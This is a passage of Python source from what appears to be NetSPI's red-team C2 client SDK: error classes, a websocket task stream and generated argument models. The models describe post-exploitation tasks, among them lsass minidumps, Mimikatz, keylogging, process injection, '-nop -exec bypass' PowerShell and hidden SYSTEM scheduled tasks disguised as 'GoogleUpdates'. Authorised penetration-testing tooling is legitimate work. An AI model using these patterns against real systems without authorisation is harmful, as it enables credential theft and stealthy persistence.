            self.message = message.decode()
        else:
            self.message = message

    def __str__(self):
        if self.response_code is not None:
            return f"{self.response_code}: {self.response_body}"
        else:
            return self.message


class RTTTaskError(Exception):
    def __init__(
        self,
        error_info: "TaskErrorInfo",
    ):
        super().__init__(self, error_info.description)
        self.code = error_info.code
        self.description = error_info.description
        self.os_code = error_info.os_code
        self.os_description = error_info.os_description

    def __str__(self):
        parts = [
            self.description,
            f"[{self.code}]" if self.code else None,
            "/" if self.description and self.os_description else None,
            self.os_description,
            f"[{self.os_code}]" if self.os_code else None,
        ]
        return " ".join([p for p in parts if p])


class RTTHttpError(RTTError):
    pass


class RTTServerError(RTTError):
    pass


class RTTIncompatibleServer(RTTServerError):
    pass


class RTTAuthenticationTimedOut(RTTError):
    pass


class RTTAuthenticationError(RTTHttpError):
    pass


class RTTParsingError(RTTHttpError):
    pass


class RTTValidationError(RTTHttpError):
    pass


def on_http_error(error):
    def wrap(f):
        @functools.wraps(f)
        def wrapped_f(*args, **kwargs):
            try:
                return f(*args, **kwargs)
            except RTTHttpError as e:
                raise error(e.message, e.response_code, e.response_body) from e

        return wrapped_f

    return wrap



# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 NetSPI <rtt.support@netspi.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

import asyncio
import socket
from datetime import datetime, timedelta
from typing import TYPE_CHECKING, Callable, List, Optional

import websockets

from rtt_sdk import logging

if TYPE_CHECKING:
    from rtt_sdk.client import RTTClient

from rtt_sdk.models import TicketInResponse


class WebsocketStream:
    def __init__(self, client: "RTTClient", ticket_url: str, websocket_url: Optional[str] = None):
        self._client = client
        self._ticket_url = ticket_url  # f"{self._tool}/tasks/feed"
        self._websocket_url = (
            websocket_url if websocket_url else ticket_url.replace("https://", "wss://").replace("http://", "ws://")
        )
        self._callbacks: List[Callable] = []
        self._ticket: Optional[TicketInResponse] = None
        self._reset_time: Optional[datetime] = None
        self._max_retries = 5
        self.cursor: str = ""

    def _refresh_ticket(self):
        self._ticket = TicketInResponse(**self._client.get(self._ticket_url))
        self._reset_time = datetime.now() + timedelta(minutes=self._ticket.expires_in - 1)

    def add_callback(self, callback: Callable) -> None:
        self._callbacks.append(callback)

    async def connect(self):
        while True:
            self._refresh_ticket()
            logging.debug("[STREAM] ticket refreshed.")
            try:
                cursor = self.cursor
                ws_url_with_ticket = f"{self._websocket_url}?ticket={self._ticket.ticket}"
                if cursor:
                    logging.debug("[STREAM] cursor: " + cursor)
                    ws_url_with_ticket += "&cursor=" + cursor
                else:
                    logging.debug("[STREAM] no cursor")
                async with websockets.connect(ws_url_with_ticket) as ws:
                    logging.debug("[STREAM] connected.")
                    while True:
                        try:
                            if cursor != self.cursor:
                                logging.debug("[STREAM] new cursor, reconnecting")
                                break
                            time_left = int((self._reset_time - datetime.now()).total_seconds())
                            ws_data = await asyncio.wait_for(ws.recv(), timeout=time_left)
                            for callback in self._callbacks[:]:
                                callback(ws_data)
                        except asyncio.TimeoutError:
                            break
                        except websockets.exceptions.ConnectionClosed:
                            try:
                                pong = await ws.ping()
                                await asyncio.wait_for(pong, timeout=5)
                                continue
                            except Exception:
                                break
            except socket.gaierror:
                continue



# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 NetSPI <rtt.support@netspi.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

import os
from typing import Optional


def log(message: str, context: Optional[str] = None):
    if context:
        print(f"[RTT:{context}] {message}")
    else:
        print(f"[RTT] {message}")


def warn(message: str):
    log(message, "-")


def error(message: str):
    log(message, "!")


def success(message: str):
    log(message, "+")


def debug(message: str):
    if os.environ.get('DEBUG', False):
        log(message, "=")



# generated by datamodel-codegen:
#   filename:  openapi.json
#   timestamp: 2021-03-15T20:51:22+00:00

from __future__ import annotations

from datetime import datetime
from enum import Enum
from typing import Any, Dict, List, Optional
from uuid import UUID

from pydantic import Field

from rtt_sdk.schema import Schema, autocomplete


@autocomplete
class AccessToken(Schema):
    access_token: str = Field(..., title="Access Token")
    token_type: str = Field(..., title="Token Type")


@autocomplete
class ApiConfig(Schema):
    api_version: str = Field(..., alias="apiVersion", title="Apiversion")
    app_version: str = Field(..., alias="appVersion", title="Appversion")
    env: str = Field(..., title="Env")
    storage_url: str = Field(..., alias="storageUrl", title="Storageurl")


class Architecture(str, Enum):
    x86 = "x86"
    x64 = "x64"


@autocomplete
class BaseUrlArgument(Schema):
    base_url: Optional[str] = Field(
        "",
        alias="baseUrl",
        description="Base URL (default is from profile)",
        example="http://mycustom.com",
        title="Baseurl",
    )


@autocomplete
class BlobReference(Schema):
    id: str = Field(..., description="Blob identifier", title="Id")
    name: Optional[str] = Field(None, description="Contextual name", title="Name")


@autocomplete
class BlobReferenceOrData(Schema):
    id: Optional[str] = Field(None, description="Blob identifier", title="Id")
    name: Optional[str] = Field(None, description="Contextual name", title="Name")
    data: Optional[bytes] = Field(None, description="Raw data", title="Data")


@autocomplete
class BlobReferenceOrDataRoot(Schema):
    id: Optional[str] = Field(None, description="Blob identifier", title="Id")
    name: Optional[str] = Field(None, description="Contextual name", title="Name")
    data: Optional[bytes] = Field(None, description="Raw data", title="Data")


@autocomplete
class BodyCreateBlobApiBlobsPost(Schema):
    data: bytes = Field(..., title="Data")


@autocomplete
class BodyLoginForAccessTokenApiAuthTokenPost(Schema):
    grant_type: Optional[str] = Field(None, regex="password", title="Grant Type")
    username: str = Field(..., title="Username")
    password: str = Field(..., title="Password")
    scope: Optional[str] = Field("", title="Scope")
    client_id: Optional[str] = Field(None, title="Client Id")
    client_secret: Optional[str] = Field(None, title="Client Secret")


@autocomplete
class Camera(Schema):
    id: int = Field(..., description="Camera ID", example=1, title="Id")
    name: Optional[str] = Field(None, description="Camera Name", example="Logitech C120", title="Name")


@autocomplete
class CameraCaptureArguments(Schema):
    camera_id: int = Field(
        ...,
        alias="cameraId",
        description="Target camera ID",
        example=1,
        title="Cameraid",
    )
    quality: Optional[int] = Field(
        25,
        description="Capture quality level",
        example=25,
        ge=1.0,
        le=99.0,
        title="Quality",
    )


@autocomplete
class CameraListArguments(Schema):
    pass


@autocomplete
class ContextIdleArguments(Schema):
    pass


@autocomplete
class ContextProcessArguments(Schema):
    pass


@autocomplete
class ContextUserArguments(Schema):
    verbose: Optional[bool] = Field(
        False,
        description="Provide verbose information about the current token",
        example=False,
        title="Verbose",
    )


@autocomplete
class DiscoveredInstance(Schema):
    path: str = Field(..., description="Path of discovery", example="mypipe1", title="Path")
    tag: str = Field(..., description="Instance tag", example="jPc4dpYI", title="Tag")


class DotNetFrameworkVersion(str, Enum):
    field_2 = "2"
    field_4 = "4"
    unknown = "unknown"


@autocomplete
class EndpointArgument(Schema):
    endpoint: str = Field(
        ...,
        description="Web endpoint path to host data",
        example="/custom",
        title="Endpoint",
    )


@autocomplete
class ExitArguments(Schema):
    pass


@autocomplete
class FileChangeDirectoryArguments(Schema):
    directory: Optional[str] = Field(
        "",
        description="New directory (leave empty/ommit to retrieve current)",
        example="C:\\Windows",
        title="Directory",
    )


@autocomplete
class FileCopyArguments(Schema):
    source: str = Field(
        ...,
        description="Remote source file path (supports environment variables)",
        example="C:\\source.ext",
        title="Source",
    )
    destination: str = Field(
        ...,
        description="Remote destination file path (supports environment variables)",
        example="%WINDIR%\\destination.ext",
        title="Destination",
    )
    force: Optional[bool] = Field(
        False,
        description="Overwrite the target file if needed",
        example=False,
        title="Force",
    )


@autocomplete
class FileDownloadArguments(Schema):
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="C:\\Windows\\win.ini",
        title="Path",
    )


@autocomplete
class FileMakeDirectoryArguments(Schema):
    path: str = Field(
        ...,
        description="Remote directory path (supports environment variables)",
        example="C:\\temporary",
        title="Path",
    )


@autocomplete
class FileMoveArguments(Schema):
    source: str = Field(
        ...,
        description="Remote source file path (supports environment variables)",
        example="C:\\source.ext",
        title="Source",
    )
    destination: str = Field(
        ...,
        description="Remote destination file path (supports environment variables)",
        example="%WINDIR%\\destination.ext",
        title="Destination",
    )
    force: Optional[bool] = Field(
        False,
        description="Overwrite the target file if needed",
        example=False,
        title="Force",
    )


@autocomplete
class FileOrDirectory(Schema):
    name: str = Field(..., description="File/Directory name", example="win.ini", title="Name")
    is_dir: Optional[bool] = Field(
        False,
        alias="isDir",
        description="Object is a directory",
        example=False,
        title="Isdir",
    )
    time: datetime = Field(
        ...,
        description="Last queried time metric (access, create, write)",
        example="2000-01-02T03:04:05",
        title="Time",
    )
    size: Optional[int] = Field(None, description="File size in bytes ", example=1423, title="Size")


@autocomplete
class FileRemoveArguments(Schema):
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="%WINDIR%\\temporary.ext",
        title="Path",
    )
    force: Optional[bool] = Field(False, description="Overwrite the target file if needed", title="Force")


@autocomplete
class FileRemoveDirectoryArguments(Schema):
    path: str = Field(
        ...,
        description="Remote directory path (supports environment variables)",
        example="C:\\temporary",
        title="Path",
    )


@autocomplete
class FileUploadArguments(Schema):
    data: BlobReferenceOrData = Field(..., description="File data to write", example="EXAMPLE_DATA", title="Data")
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="C:\\Windows\\upload.ext",
        title="Path",
    )
    force: Optional[bool] = Field(
        False,
        description="Overwrite the target file if needed",
        example=False,
        title="Force",
    )


@autocomplete
class HostPowershellArguments(Schema):
    base_url: Optional[str] = Field(
        "",
        alias="baseUrl",
        description="Base URL (default is from profile)",
        example="http://mycustom.com",
        title="Baseurl",
    )
    local: Optional[bool] = Field(True, description="Remain in the local process after load", title="Local")
    process: Optional[str] = Field(
        "",
        description="Process to inject into (not compatible with -l/--local)",
        title="Process",
    )
    com_object: Optional[bool] = Field(
        False,
        alias="comObject",
        description="Use IE com object to download payload (useful for stealth/proxies)",
        title="Comobject",
    )
    endpoint: Optional[str] = Field(
        "",
        description="Web endpoint path to host data",
        example="/custom",
        title="Endpoint",
    )


@autocomplete
class HostUnloadArguments(Schema):
    pass


class HostingEncoding(str, Enum):
    none = "none"
    base64 = "base64"
    hex = "hex"


@autocomplete
class InfoArguments(Schema):
    pass


class InjectionTechnique(str, Enum):
    standard = "standard"
    setthreadcontext = "setthreadcontext"


@autocomplete
class InstanceInUpdate(Schema):
    name: str = Field(..., max_length=100, title="Name")
    hidden: bool = Field(..., title="Hidden")


@autocomplete
class KerberosLoadArguments(Schema):
    ticket: BlobReferenceOrData = Field(
        ...,
        description="Kerberos ticket data",
        example="EXAMPLE_TICKET_DATA",
        title="Ticket",
    )


@autocomplete
class KerberosPurgeArguments(Schema):
    pass


@autocomplete
class KeylogGatherArguments(Schema):
    path: Optional[str] = Field(
        "",
        description="Encrypted keylog file location (otherwise assumed profile['keylogger']['storage_path'])",
        example="C:\\Users\\Public\\log.dat",
        title="Path",
    )


@autocomplete
class LinkArguments(Schema):
    target: str = Field(
        ...,
        description="Target IP, hostname, or address",
        example="localhost",
        title="Target",
    )


@autocomplete
class ManagedModuleArgumentsBase(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )


@autocomplete
class ManagedModuleExecuteArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
    input: str = Field(
        ...,
        description="Input to managed module",
        example="run download",
        title="Input",
    )
    method: str = Field(
        ...,
        description="Fully qualified method name",
        example="Namespace.Class.Method",
        title="Method",
    )


@autocomplete
class ManagedModuleLoadArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
    module: BlobReferenceOrData = Field(
        ...,
        description="Managed assembly to load (.NET DLL)",
        example="MZ_EXAMPLE_MODULE",
        title="Module",
    )


@autocomplete
class ManagedModuleUnloadArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )


@autocomplete
class MimikatzArgumentsBase(Schema):
    pass


@autocomplete
class MimikatzExecuteArguments(Schema):
    input: str = Field(..., description="Input to Mimikatz module", example="version", title="Input")


@autocomplete
class MimikatzLoadArguments(Schema):
    pass


@autocomplete
class MinidumpArguments(Schema):
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="%TEMP%\\proc.dmp",
        title="Path",
    )
    process: Optional[str] = Field(
        "",
        description="Process name/pid to dump (otherwise local)",
        example="lsass.exe",
        title="Process",
    )


@autocomplete
class MirrorTaskArguments(Schema):
    pass


@autocomplete
class NamedPipeSendArguments(Schema):
    host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
    pipe: str = Field(..., description="Named pipe for delivery", example="SvcPipe", title="Pipe")
    data: BlobReferenceOrData = Field(..., description="Data to send", example="EXAMPLE_PIPE_DATA", title="Data")
    timeout: Optional[int] = Field(0, description="Named pipe timeout in seconds", title="Timeout")
    compress: Optional[bool] = Field(False, description="Compress data with zlib before sending", title="Compress")
    wait: Optional[bool] = Field(False, description="Wait for pipe response data", title="Wait")
    encryption_key: Optional[bytes] = Field(
        "",
        alias="encryptionKey",
        description="Symetric key to encrypt with, ommit for no encryption",
        title="Encryptionkey",
    )


@autocomplete
class NativeModuleArgumentsBase(Schema):
    pass


@autocomplete
class NativeModuleExecuteArguments(Schema):
    input: str = Field(..., description="Input to native module", example="version", title="Input")
    export: str = Field(
        ...,
        description="Exported function name from module (first match)",
        example="MyExport",
        title="Export",
    )


@autocomplete
class NativeModuleLoadArguments(Schema):
    module: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        description="Native PE module to load (DLL)",
        example="MZ_EXAMPLE_MODULE",
        title="Module",
    )
    obfuscate: Optional[bool] = Field(
        False,
        description="Obfuscate module in memory between uses",
        example=False,
        title="Obfuscate",
    )


@autocomplete
class NativeModuleUnloadArguments(Schema):
    pass


@autocomplete
class NetworkConnectArguments(Schema):
    hosts: str = Field(
        ...,
        description="IP address(s) in single, range, or CIDR format",
        example="192.168.1.1/26",
        title="Hosts",
    )
    port: int = Field(..., description="Destination port", example="3389", title="Port")
    timeout: Optional[int] = Field(1000, description="TCP timeout in ms", example=1000, title="Timeout")


@autocomplete
class NetworkEnumerateSessionArguments(Schema):
    host: str = Field(..., description="Hostname or IP address", example="REMOTE-PC", title="Host")


@autocomplete
class NetworkPingArguments(Schema):
    host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")


@autocomplete
class NetworkResolveArguments(Schema):
    host: str = Field(..., description="Hostname", example="ADAM-PC", title="Host")


class PayloadCacheStatus(str, Enum):
    completed = "completed"
    auth_pending = "auth_pending"
    auth_required = "auth_required"


@autocomplete
class PowershellBaseArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )


@autocomplete
class PowershellExecuteArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )
    input: str = Field(
        ...,
        description="Input to Powershell module",
        example="Get-Host | ft",
        title="Input",
    )


@autocomplete
class PowershellLoadArguments(Schema):
    version: Optional[DotNetFrameworkVersion] = Field(
        "unknown",
        description="Framework version for hosting (otherwise assumed from instance version)",
        example="4",
    )


@autocomplete
class PowershellStageArguments(Schema):
    script: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        description="Script data to stage before all additional execution",
        example="EXAMPLE_POSH_CODE",
        title="Script",
    )
    script_url: Optional[str] = Field(
        "",
        alias="scriptUrl",
        description="URL path for hosted script file",
        example="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1",
        title="Scripturl",
    )


@autocomplete
class PowershellUnstageArguments(Schema):
    pass


@autocomplete
class Process(Schema):
    ppid: int = Field(..., description="Parent process id", example=567, title="Ppid")
    pid: int = Field(..., description="Process id", example=432, title="Pid")
    sess: int = Field(..., description="Session id", example=1, title="Sess")
    arch: Optional[Architecture] = Field(None, description="Process architecture", example="x64")
    name: Optional[str] = Field(None, description="Process name", example="cmd.exe", title="Name")
    owner: Optional[str] = Field(None, description="Process owner", example="ACME\\John", title="Owner")
    path: Optional[str] = Field(
        None,
        description="Full process path",
        example="C:\\Windows\\System32\\cmd.exe",
        title="Path",
    )


@autocomplete
class ProcessExecuteBaseArguments(Schema):
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )


@autocomplete
class ProcessListArguments(Schema):
    verbose: Optional[bool] = Field(
        False,
        description="Provide verbose information about processes",
        example=False,
        title="Verbose",
    )


@autocomplete
class ProcessPowershellArguments(Schema):
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )
    additional_args: str = Field(
        ...,
        alias="additionalArgs",
        description="Add arguments to powershell.exe (-nop or -v2)",
        example="-nop -exec bypass",
        title="Additionalargs",
    )


@autocomplete
class ProcessShellArguments(Schema):
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )


@autocomplete
class ProcessStartArguments(Schema):
    command: str = Field(
        ...,
        description="Full command line string",
        example="rundll32.exe mine.dll,export",
        title="Command",
    )
    parent: Optional[str] = Field(
        "",
        description="Parent process name/id to spawn under (otherwise local)",
        example="explorer.exe",
        title="Parent",
    )
    microsoft_only: Optional[bool] = Field(
        False,
        alias="microsoftOnly",
        description="Use process mitigation policies to block the loading of 3rd party code on process start",
        example=False,
        title="Microsoftonly",
    )


@autocomplete
class ProfileInCreate(Schema):
    name: str = Field(..., max_length=265, title="Name")
    data: Dict[str, Any] = Field(..., title="Data")


class Protocol(str, Enum):
    smb = "smb"
    http = "http"
    https = "https"
    dns = "dns"
    icmp = "icmp"


@autocomplete
class RegistryDeleteArguments(Schema):
    path: str = Field(
        ...,
        description="Full registry path",
        example="HKEY_LOCAL_MACHINE\\Software",
        title="Path",
    )
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")


@autocomplete
class RegistryQueryArguments(Schema):
    path: str = Field(
        ...,
        description="Full registry path",
        example="HKEY_LOCAL_MACHINE\\Software",
        title="Path",
    )
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")


class RegistryType(str, Enum):
    reg_none = "REG_NONE"
    reg_sz = "REG_SZ"
    reg_expand_sz = "REG_EXPAND_SZ"
    reg_binary = "REG_BINARY"
    reg_dword = "REG_DWORD"
    reg_dword_little_endian = "REG_DWORD_LITTLE_ENDIAN"
    reg_dword_big_endian = "REG_DWORD_BIG_ENDIAN"
    reg_link = "REG_LINK"
    reg_multi_sz = "REG_MULTI_SZ"
    reg_resource_list = "REG_RESOURCE_LIST"
    reg_full_resource_descriptor = "REG_FULL_RESOURCE_DESCRIPTOR"
    reg_resource_requirements_list = "REG_RESOURCE_REQUIREMENTS_LIST"
    reg_qword = "REG_QWORD"
    reg_qword_little_endian = "REG_QWORD_LITTLE_ENDIAN"


@autocomplete
class RegistryValue(Schema):
    name: str = Field(..., description="Value name", title="Name")
    type: RegistryType = Field(..., description="Value type")
    data: str = Field(
        ...,
        description="Value data (Base64 for REG_BINARY and '|' to separate MULTI_SZ)",
        title="Data",
    )


@autocomplete
class RoundtripToken(Schema):
    token: str = Field(..., title="Token")
    verify_url: str = Field(..., alias="verifyUrl", title="Verifyurl")
    finish_url: str = Field(..., alias="finishUrl", title="Finishurl")
    expires: datetime = Field(..., title="Expires")


@autocomplete
class RouteInResponse(Schema):
    id: UUID = Field(..., title="Id")
    instance_id: UUID = Field(..., alias="instanceId", title="Instanceid")
    protocol: Protocol = Field(...)
    port: int = Field(..., title="Port")
    pipe: str = Field(..., title="Pipe")
    timeout: int = Field(..., title="Timeout")


@autocomplete
class ScheduledTaskArgumentBase(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")


@autocomplete
class ScheduledTaskCreateArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
    command: str = Field(..., description="Command binary to execute", example="cmd.exe", title="Command")
    arguments: Optional[str] = Field(
        "",
        description="Arguments to command binary",
        example="/c whoami",
        title="Arguments",
    )
    user: str = Field(
        ...,
        description="User ID for task execution (name, SID, etc)",
        example="NT AUTHORITY\\SYSTEM",
        title="User",
    )
    hidden: Optional[bool] = Field(False, description="Mark the task as hidden", example=True, title="Hidden")
    high_privilege: Optional[bool] = Field(
        False,
        alias="highPrivilege",
        description="Run with highest privileges",
        example=True,
        title="Highprivilege",
    )


@autocomplete
class ScheduledTaskCreateExArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
    xml: BlobReferenceOrData = Field(
        ...,
        description="Raw task XML data",
        example="EXAMPLE_SCHTASKS_XML",
        title="Xml",
    )


@autocomplete
class ScheduledTaskDeleteArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")


@autocomplete
class ScheduledTaskQueryArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: Optional[str] = Field(
        "",
        description="Task name (ommit to query folder)",
        example="GoogleUpdates",
        title="Task",
    )


@autocomplete
class ScheduledTaskStartArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")


class ScheduledTaskState(str, Enum):
    unknown = "unknown"
    disabled = "disabled"
    queued = "queued"
    ready = "ready"
    running = "running"


@autocomplete
class ScheduledTaskStopArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    folder: Optional[str] = Field(
        "\\",
        description="Parent folder for operation",
        example="\\Microsoft\\",
        title="Folder",
    )
    task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")


@autocomplete
class SchemaModel(Schema):
    pass


@autocomplete
class ScreenshotArguments(Schema):
    quality: Optional[int] = Field(
        25,
        description="Capture quality level",
        example=25,
        ge=1.0,
        le=99.0,
        title="Quality",
    )


@autocomplete
class ScriptArguments(Schema):
    name: str = Field(..., description="Script name", example="pivot.py", title="Name")


@autocomplete
class ScriptToken(Schema):
    access_token: str = Field(..., title="Access Token")
    token_type: str = Field(..., title="Token Type")
    task_id: UUID = Field(..., title="Task Id")


class SePrivilege(str, Enum):
    se_create_token_privilege = "SeCreateTokenPrivilege"
    se_assign_primary_token_privilege = "SeAssignPrimaryTokenPrivilege"
    se_lock_memory_privilege = "SeLockMemoryPrivilege"
    se_increase_quota_privilege = "SeIncreaseQuotaPrivilege"
    se_machine_account_privilege = "SeMachineAccountPrivilege"
    se_tcb_privilege = "SeTcbPrivilege"
    se_security_privilege = "SeSecurityPrivilege"
    se_take_ownership_privilege = "SeTakeOwnershipPrivilege"
    se_load_driver_privilege = "SeLoadDriverPrivilege"
    se_system_profile_privilege = "SeSystemProfilePrivilege"
    se_systemtime_privilege = "SeSystemtimePrivilege"
    se_profile_single_process_privilege = "SeProfileSingleProcessPrivilege"
    se_increase_base_priority_privilege = "SeIncreaseBasePriorityPrivilege"
    se_create_pagefile_privilege = "SeCreatePagefilePrivilege"
    se_create_permanent_privilege = "SeCreatePermanentPrivilege"
    se_backup_privilege = "SeBackupPrivilege"
    se_restore_privilege = "SeRestorePrivilege"
    se_shutdown_privilege = "SeShutdownPrivilege"
    se_debug_privilege = "SeDebugPrivilege"
    se_audit_privilege = "SeAuditPrivilege"
    se_system_environment_privilege = "SeSystemEnvironmentPrivilege"
    se_change_notify_privilege = "SeChangeNotifyPrivilege"
    se_remote_shutdown_privilege = "SeRemoteShutdownPrivilege"
    se_undock_privilege = "SeUndockPrivilege"
    se_sync_agent_privilege = "SeSyncAgentPrivilege"
    se_enable_delegation_privilege = "SeEnableDelegationPrivilege"
    se_manage_volume_privilege = "SeManageVolumePrivilege"
    se_impersonate_privilege = "SeImpersonatePrivilege"
    se_create_global_privilege = "SeCreateGlobalPrivilege"
    se_trusted_cred_man_access_privilege = "SeTrustedCredManAccessPrivilege"
    se_relabel_privilege = "SeRelabelPrivilege"
    se_increase_working_set_privilege = "SeIncreaseWorkingSetPrivilege"
    se_time_zone_privilege = "SeTimeZonePrivilege"
    se_create_symbolic_link_privilege = "SeCreateSymbolicLinkPrivilege"
    se_delegate_session_user_impersonate_privilege = "SeDelegateSessionUserImpersonatePrivilege"


@autocomplete
class ServerTaskArguments(Schema):
    pass


@autocomplete
class ServiceArgumentsBase(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")


@autocomplete
class ServiceCreateArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")
    display_name: Optional[str] = Field(
        "",
        alias="displayName",
        description="Friendly display name",
        example="My Service",
        title="Displayname",
    )
    command: str = Field(
        ...,
        description="Command string",
